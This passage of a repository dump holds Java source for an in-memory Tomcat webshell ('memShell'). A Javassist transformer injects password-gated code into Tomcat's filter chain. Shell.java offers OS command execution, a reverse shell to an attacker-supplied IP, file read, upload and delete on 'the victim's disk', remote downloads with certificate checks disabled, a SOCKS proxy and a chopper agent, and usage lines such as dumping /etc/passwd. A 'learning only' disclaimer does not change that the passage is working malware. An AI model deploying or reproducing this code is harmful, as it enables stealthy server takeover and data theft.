0) { 77 | SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket"); 78 | try { 79 | 80 | int readlen = MyRequest.getContentLength(request); 81 | byte[] buff = new byte[readlen]; 82 | // request.getInputStream().read(buff, 0, readlen); 83 | Object ins = MyRequest.getInputStream(request); 84 | MyServletInputStream.read(ins, buff, 0, readlen); 85 | ByteBuffer buf = ByteBuffer.allocate(readlen); 86 | buf.clear(); 87 | buf.put(buff); 88 | buf.flip(); 89 | 90 | while (buf.hasRemaining()) { 91 | socketChannel.write(buf); 92 | } 93 | MyResponse.setHeader(response, "X-STATUS", "OK"); 94 | // response.getOutputStream().close(); 95 | 96 | } catch (Exception e) { 97 | System.out.println(e.getMessage()); 98 | MyResponse.setHeader(response, "X-ERROR", e.getMessage()); 99 | MyResponse.setHeader(response, "X-STATUS", "FAIL"); 100 | socketChannel.socket().close(); 101 | } 102 | } 103 | } else { 104 | // PrintWriter o = response.getWriter(); 105 | // out.print("Georg says, 'All seems fine'"); 106 | MyResponse.getWriter(response).print("Georg says, 'All seems fine'"); 107 | } 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Shell.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | import java.io.BufferedReader; 3 | import java.io.BufferedWriter; 4 | import java.io.DataInputStream; 5 | import java.io.DataOutputStream; 6 | import java.io.File; 7 | import java.io.FileInputStream; 8 | import java.io.FileNotFoundException; 9 | import java.io.FileOutputStream; 10 | import java.io.FileReader; 11 | import java.io.IOException; 12 | import java.io.InputStream; 13 | import java.io.InputStreamReader; 14 | import java.io.OutputStream; 15 | import java.io.OutputStreamWriter; 16 | import java.io.PrintWriter; 17 | import java.lang.reflect.Method; 18 | import java.net.HttpURLConnection; 19 | import java.net.Socket; 20 | import java.net.URL; 21 | import java.net.URLConnection; 22 | import java.security.cert.CertificateException; 23 | import java.util.Base64; 24 | 25 | import javax.net.ssl.HostnameVerifier; 26 | import javax.net.ssl.HttpsURLConnection; 27 | import javax.net.ssl.SSLContext; 28 | import javax.net.ssl.SSLSession; 29 | import javax.net.ssl.TrustManager; 30 | import javax.net.ssl.X509TrustManager; 31 | import javax.security.cert.X509Certificate; 32 | import javax.servlet.ServletContext; 33 | import javax.servlet.ServletException; 34 | import javax.servlet.ServletOutputStream; 35 | import javax.servlet.ServletRequest; 36 | import javax.servlet.ServletResponse; 37 | import javax.servlet.http.HttpSession; 38 | 39 | public class Shell { 40 | 41 | public static String execute(String cmd) throws Exception { 42 | String result = ""; 43 | if (cmd != null && cmd.length() > 0) { 44 | 45 | Process p = Runtime.getRuntime().exec(cmd); 46 | OutputStream os = p.getOutputStream(); 47 | InputStream in = p.getInputStream(); 48 | DataInputStream dis = new DataInputStream(in); 49 | String disr = dis.readLine(); 50 | while (disr != null) { 51 | result = result + disr + "\n"; 52 | disr = dis.readLine(); 53 | } 54 | } 55 | return result; 56 | } 57 | 58 | public static String connectBack(String ip, String port) throws Exception { 59 | class StreamConnector extends Thread { 60 | InputStream sp; 61 | OutputStream gh; 62 | 63 | StreamConnector(InputStream sp, OutputStream gh) { 64 | this.sp = sp; 65 | this.gh = gh; 66 | } 67 | 68 | public void run() { 69 | BufferedReader xp = null; 70 | BufferedWriter ydg = null; 71 | try { 72 | xp = new BufferedReader(new InputStreamReader(this.sp)); 73 | ydg = new BufferedWriter(new OutputStreamWriter(this.gh)); 74 | char buffer[] = new char[8192]; 75 | int length; 76 | while ((length = xp.read(buffer, 0, buffer.length)) > 0) { 77 | ydg.write(buffer, 0, length); 78 | ydg.flush(); 79 | } 80 | } catch (Exception e) { 81 | } 82 | try { 83 | if (xp != null) 84 | xp.close(); 85 | if (ydg != null) 86 | ydg.close(); 87 | } catch (Exception e) { 88 | } 89 | } 90 | } 91 | try { 92 | String ShellPath; 93 | if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { 94 | ShellPath = new String("/bin/sh"); 95 | } else { 96 | ShellPath = new String("cmd.exe"); 97 | } 98 | 99 | Socket socket = new Socket(ip, Integer.parseInt(port)); 100 | Process process = Runtime.getRuntime().exec(ShellPath); 101 | (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); 102 | (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); 103 | return "Successful!"; 104 | } catch (Exception e) { 105 | return e.getMessage(); 106 | } 107 | } 108 | 109 | public static String help() { 110 | return "Webshell in Memory:\n\n" + "Usage:\n" + "anyurl?pwd=pass //show this help page.\n" 111 | + "anyurl?pwd=pass&model=exec&cmd=whoami //run os command.\n" 112 | + "anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.\n" 113 | + "anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.\n" 114 | + "anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.\n" 115 | + "anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.\n" 116 | + "anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.\n" 117 | + "anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim.\n" 118 | + "anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim.\n\n" 119 | + "For learning exchanges only, do not use for illegal purposes.by rebeyond.\n"; 120 | } 121 | 122 | public static String list(String path) { 123 | String result = ""; 124 | File f = new File(path); 125 | if (f.isDirectory()) { 126 | for (File temp : f.listFiles()) { 127 | if (temp.isFile()) { 128 | result = result + (temp.isDirectory()?"r":"-") + " " + temp.getName() + " " + temp.length() + "\n"; 129 | } 130 | else { 131 | result = result + (temp.isDirectory()?"r":"-")+ " " + temp.getName() + " " + temp.length() + "\n"; 132 | } 133 | } 134 | } else { 135 | result = result + f.isDirectory() + " " + f.getName() + " " + f.length() + "\n"; 136 | } 137 | return result; 138 | } 139 | public static String delete(String path) { 140 | String result = ""; 141 | File f = new File(path); 142 | if (f.isDirectory()) { 143 | result = deleteDir(f)?"delete directory "+path+" successfully.":"delete "+path+" failed(maybe only some files are not deleted)."; 144 | } else { 145 | result = f.delete()?"delete "+path+" successfully.":"delete "+path+" failed."; 146 | } 147 | return result; 148 | } 149 | public static String showFile(String path) throws Exception { 150 | StringBuffer result= new StringBuffer(); 151 | File f = new File(path); 152 | if (f.exists()&&f.isFile()) { 153 | FileReader reader = new FileReader(f); 154 | BufferedReader br = new BufferedReader(reader); 155 | String str = null; 156 | while((str = br.readLine()) != null) { 157 | result.append(str+"\n"); 158 | } 159 | br.close(); 160 | reader.close(); 161 | } 162 | return result.toString(); 163 | } 164 | private static boolean deleteDir(File dir){ 165 | boolean result=true; 166 | if(dir.isDirectory()){ 167 | File[] files = dir.listFiles(); 168 | for(int i=0; i 0) 193 | response.getOutputStream().write(b, 0, len); 194 | inStream.close(); 195 | } catch (IOException e) { 196 | e.printStackTrace(); 197 | } 198 | 199 | }*/ 200 | 201 | } 202 | public static String upload(String path,String fileContent,String type) throws Exception 203 | { 204 | FileOutputStream fos=new FileOutputStream(path); 205 | if (type.equalsIgnoreCase("a")) 206 | { 207 | fos.write(fileContent.getBytes()); 208 | fos.flush(); 209 | } 210 | else if(type.equalsIgnoreCase("b")) 211 | { 212 | fos.write(Base64.getDecoder().decode(fileContent)); 213 | } 214 | fos.close(); 215 | return "file " + path + " is upload successfully,and size is " + new File(path).length() + " Byte."; 216 | } 217 | 218 | public static String urldownload(String url, String path) throws Exception { 219 | SSLContext sslcontext = SSLContext.getInstance("SSL", "SunJSSE"); 220 | sslcontext.init(null, new TrustManager[] { new X509TrustManager() { 221 | 222 | @Override 223 | public void checkClientTrusted(java.security.cert.X509Certificate[] arg0, String arg1) 224 | throws CertificateException { 225 | // TODO Auto-generated method stub 226 | 227 | } 228 | 229 | @Override 230 | public void checkServerTrusted(java.security.cert.X509Certificate[] arg0, String arg1) 231 | throws CertificateException { 232 | // TODO Auto-generated method stub 233 | 234 | } 235 | 236 | @Override 237 | public java.security.cert.X509Certificate[] getAcceptedIssuers() { 238 | // TODO Auto-generated method stub 239 | return null; 240 | } 241 | 242 | } }, new java.security.SecureRandom()); 243 | // URL url = new URL(url); 244 | HostnameVerifier ignoreHostnameVerifier = new HostnameVerifier() { 245 | public boolean verify(String s, SSLSession sslsession) { 246 | return true; 247 | } 248 | }; 249 | HttpURLConnection urlCon; 250 | URL downloadUrl=new URL(url); 251 | HttpsURLConnection.setDefaultHostnameVerifier(ignoreHostnameVerifier); 252 | HttpsURLConnection.setDefaultSSLSocketFactory(sslcontext.getSocketFactory()); 253 | urlCon = (HttpsURLConnection) downloadUrl.openConnection(); 254 | urlCon.setConnectTimeout(6000); 255 | urlCon.setReadTimeout(6000); 256 | int code = urlCon.getResponseCode(); 257 | if (code != HttpURLConnection.HTTP_OK) { 258 | throw new Exception("文件读取失败"); 259 | } 260 | // 读文件流 261 | DataInputStream in = new DataInputStream(urlCon.getInputStream()); 262 | DataOutputStream out = new DataOutputStream(new FileOutputStream(path)); 263 | byte[] buffer = new byte[2048]; 264 | int count = 0; 265 | while ((count = in.read(buffer)) > 0) { 266 | out.write(buffer, 0, count); 267 | out.flush(); 268 | } 269 | out.close(); 270 | in.close(); 271 | return "file " + path + " downloaded successfully,and size is " + new File(path).length() + " Byte."; 272 | } 273 | 274 | public static void main(String[] args) { 275 | try { 276 | // System.out.println(Shell.execute("net user").replace("\n", "aaaaaaaaaaa")); 277 | } catch (Exception e) { 278 | // TODO Auto-generated catch block 279 | e.printStackTrace(); 280 | } 281 | } 282 | 283 | public static void eval(ServletRequest request, ServletResponse response) throws Exception { 284 | /* 285 | * Class c=Class.forName("javax/servlet/ServletRequest"); 286 | * System.out.println("classs is :"+c); Evaluate eval=new Evaluate(); 287 | * eval.doGet(request, response); 288 | */ 289 | } 290 | } 291 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/Transformer.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell; 2 | import java.io.BufferedReader; 3 | import java.io.File; 4 | import java.io.FileReader; 5 | import java.io.InputStream; 6 | import java.io.InputStreamReader; 7 | import java.lang.instrument.ClassFileTransformer; 8 | import java.lang.instrument.IllegalClassFormatException; 9 | import java.security.ProtectionDomain; 10 | 11 | import javassist.ClassClassPath; 12 | import javassist.ClassPool; 13 | import javassist.CtClass; 14 | import javassist.CtMethod; 15 | 16 | public class Transformer implements ClassFileTransformer{ 17 | @Override 18 | public byte[] transform(ClassLoader classLoader, String s, Class aClass, ProtectionDomain protectionDomain, byte[] bytes) throws IllegalClassFormatException { 19 | 20 | 21 | if ("org/apache/catalina/core/ApplicationFilterChain".equals(s)) { 22 | try { 23 | ClassPool cp = ClassPool.getDefault(); 24 | ClassClassPath classPath = new ClassClassPath(aClass); //get current class's classpath 25 | cp.insertClassPath(classPath); //add the classpath to classpool 26 | CtClass cc = cp.get("org.apache.catalina.core.ApplicationFilterChain"); 27 | CtMethod m = cc.getDeclaredMethod("internalDoFilter"); 28 | m.addLocalVariable("elapsedTime", CtClass.longType); 29 | m.insertBefore(readSource()); 30 | byte[] byteCode = cc.toBytecode(); 31 | cc.detach(); 32 | return byteCode; 33 | } catch (Exception ex) { 34 | ex.printStackTrace(); 35 | System.out.println("error:::::"+ex.getMessage()); 36 | } 37 | } 38 | 39 | return null; 40 | } 41 | public String readSource() { 42 | StringBuilder source=new StringBuilder(); 43 | InputStream is = Transformer.class.getClassLoader().getResourceAsStream("source.txt"); 44 | InputStreamReader isr = new InputStreamReader(is); 45 | String line=null; 46 | try { 47 | BufferedReader br = new BufferedReader(isr); 48 | while((line=br.readLine()) != null) { 49 | source.append(line); 50 | } 51 | } catch (Exception e) { 52 | e.printStackTrace(); 53 | } 54 | return source.toString(); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MyRequest.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | import java.lang.reflect.InvocationTargetException; 3 | 4 | public class MyRequest { 5 | public static String getParameter(Object request,String name) throws Exception 6 | { 7 | return (String)request.getClass().getMethod("getParameter", String.class).invoke(request, name); 8 | } 9 | public static Object getServletContext(Object request) throws Exception 10 | { 11 | return request.getClass().getMethod("getServletContext", null).invoke(request, new Object[] {}); 12 | } 13 | public static String getHeader(Object request,String name) throws Exception 14 | { 15 | return (String)request.getClass().getMethod("getHeader", String.class).invoke(request, name); 16 | } 17 | 18 | public static Object getSession(Object request) throws Exception 19 | { 20 | return request.getClass().getMethod("getSession", null).invoke(request, new Object[] {}); 21 | } 22 | public static int getContentLength(Object request) throws Exception 23 | { 24 | return Integer.parseInt(request.getClass().getMethod("getContentLength", null).invoke(request, new Object[] {}).toString()); 25 | } 26 | 27 | public static Object getInputStream(Object request) throws Exception 28 | { 29 | return request.getClass().getMethod("getInputStream", null).invoke(request, new Object[] {}); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MyResponse.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | import java.io.PrintWriter; 3 | import java.lang.reflect.InvocationTargetException; 4 | 5 | public class MyResponse { 6 | public static void setContentType(Object response,String arg) throws Exception 7 | { 8 | response.getClass().getMethod("setContentType", String.class).invoke(response, arg); 9 | } 10 | public static void setCharacterEncoding(Object response,String arg) throws Exception 11 | { 12 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, arg); 13 | } 14 | public static PrintWriter getWriter(Object response) throws Exception 15 | { 16 | return (PrintWriter)response.getClass().getMethod("getWriter",null).invoke(response, new Object[] {}); 17 | } 18 | 19 | public static void reset(Object response) throws Exception 20 | { 21 | response.getClass().getMethod("reset", null).invoke(response, new Object[] {}); 22 | } 23 | 24 | public static Object getOutputStream(Object response) throws Exception 25 | { 26 | return response.getClass().getMethod("getOutputStream", null).invoke(response, new Object[] {}); 27 | } 28 | public static void setHeader(Object response,String arg1,String arg2) throws Exception 29 | { 30 | response.getClass().getMethod("setHeader", String.class, String.class).invoke(response, arg1,arg2); 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MyServletContext.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | 3 | public class MyServletContext { 4 | public static String getRealPath(Object servletContext ,String arg) throws Exception 5 | { 6 | return servletContext.getClass().getMethod("getRealPath", String.class).invoke(servletContext, arg).toString(); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MyServletInputStream.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | 3 | public class MyServletInputStream { 4 | public static void read(Object servletInputStream ,byte[] a,int b,int c) throws Exception 5 | { 6 | servletInputStream.getClass().getMethod("read", byte[].class,int.class,int.class).invoke(servletInputStream, a,b,c); 7 | } 8 | 9 | } 10 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MyServletOutputStream.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | 3 | public class MyServletOutputStream { 4 | public static void write(Object servletOutputStream ,byte[] a,int b,int c) throws Exception 5 | { 6 | servletOutputStream.getClass().getMethod("write", byte[].class,int.class,int.class).invoke(servletOutputStream, a,b,c); 7 | } 8 | 9 | public static void close(Object servletOutputStream ) throws Exception 10 | { 11 | servletOutputStream.getClass().getMethod("close",null).invoke(servletOutputStream,new Object[] {}); 12 | } 13 | 14 | public static void flush(Object servletOutputStream ) throws Exception 15 | { 16 | servletOutputStream.getClass().getMethod("flush",null).invoke(servletOutputStream,new Object[] {}); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /src/net/rebeyond/memshell/redefine/MySession.java: -------------------------------------------------------------------------------- 1 | package net.rebeyond.memshell.redefine; 2 | 3 | 4 | public class MySession { 5 | public static void setAttribute(Object httpSession,String arg1,Object arg2) throws Exception 6 | { 7 | httpSession.getClass().getMethod("setAttribute",String.class,Object.class).invoke(httpSession, arg1,arg2); 8 | } 9 | 10 | public static Object getAttribute(Object httpSession,String arg1) throws Exception 11 | { 12 | return httpSession.getClass().getMethod("getAttribute",String.class).invoke(httpSession, arg1); 13 | } 14 | 15 | 16 | public static void invalidate(Object httpSession) throws Exception 17 | { 18 | httpSession.getClass().getMethod("invalidate",null).invoke(httpSession, new Object[] {}); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/other/forcedelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebeyond/memShell/7ee1d62b2225cd01066f7b4effde4155932611d1/src/other/forcedelete.exe -------------------------------------------------------------------------------- /src/source.txt: -------------------------------------------------------------------------------- 1 | javax.servlet.http.HttpServletRequest request=$1; 2 | javax.servlet.http.HttpServletResponse response = $2; 3 | String pass_the_world=request.getParameter("pass_the_world"); 4 | String model=request.getParameter("model"); 5 | String result=""; 6 | 7 | try { 8 | if (pass_the_world!=null&&pass_the_world.equals(net.rebeyond.memshell.Agent.password)) 9 | { 10 | if (model==null||model.equals("")) 11 | { 12 | result=net.rebeyond.memshell.Shell.help(); 13 | } 14 | else if (model.equalsIgnoreCase("exec")) 15 | { 16 | String cmd=request.getParameter("cmd"); 17 | result=net.rebeyond.memshell.Shell.execute(cmd); 18 | } 19 | else if (model.equalsIgnoreCase("connectback")) 20 | { 21 | String ip=request.getParameter("ip"); 22 | String port=request.getParameter("port"); 23 | result=net.rebeyond.memshell.Shell.connectBack(ip, port); 24 | } 25 | else if (model.equalsIgnoreCase("urldownload")) 26 | { 27 | String url=request.getParameter("url"); 28 | String path=request.getParameter("path"); 29 | result=net.rebeyond.memshell.Shell.urldownload(url, path); 30 | } 31 | else if (model.equalsIgnoreCase("list")) 32 | { 33 | String path=request.getParameter("path"); 34 | result=net.rebeyond.memshell.Shell.list(path); 35 | } 36 | else if (model.equalsIgnoreCase("del")) 37 | { 38 | String path=request.getParameter("path"); 39 | result=net.rebeyond.memshell.Shell.delete(path); 40 | } 41 | else if (model.equalsIgnoreCase("show")) 42 | { 43 | String path=request.getParameter("path"); 44 | result=net.rebeyond.memshell.Shell.showFile(path); 45 | } 46 | else if (model.equalsIgnoreCase("download")) 47 | { 48 | String path=request.getParameter("path"); 49 | java.io.File f = new java.io.File(path); 50 | if (f.isFile()) { 51 | String fileName = f.getName(); 52 | java.io.InputStream inStream = new java.io.FileInputStream(path); 53 | response.reset(); 54 | response.setContentType("bin"); 55 | response.addHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\""); 56 | byte[] b = new byte[100]; 57 | int len; 58 | while ((len = inStream.read(b)) > 0) 59 | response.getOutputStream().write(b, 0, len); 60 | inStream.close(); 61 | return; 62 | 63 | } 64 | } 65 | else if (model.equalsIgnoreCase("upload")) 66 | { 67 | String path=request.getParameter("path"); 68 | String fileContent=request.getParameter("content"); 69 | String type=request.getParameter("type"); 70 | if (type==null||!type.equalsIgnoreCase("b")) 71 | type="a"; 72 | result=net.rebeyond.memshell.Shell.upload(path, fileContent,type); 73 | } 74 | else if (model.equalsIgnoreCase("proxy")) 75 | { 76 | new net.rebeyond.memshell.Proxy().doProxy(request, response); 77 | return; 78 | } 79 | else if (model.equalsIgnoreCase("chopper")) 80 | { 81 | new net.rebeyond.memshell.Evaluate().doPost(request, response); 82 | return; 83 | } 84 | response.getWriter().print(result); 85 | return; 86 | } 87 | 88 | } 89 | catch(Exception e) 90 | { 91 | response.getWriter().print(e.getMessage()); 92 | } 93 | --------------------------------------------------------------------------------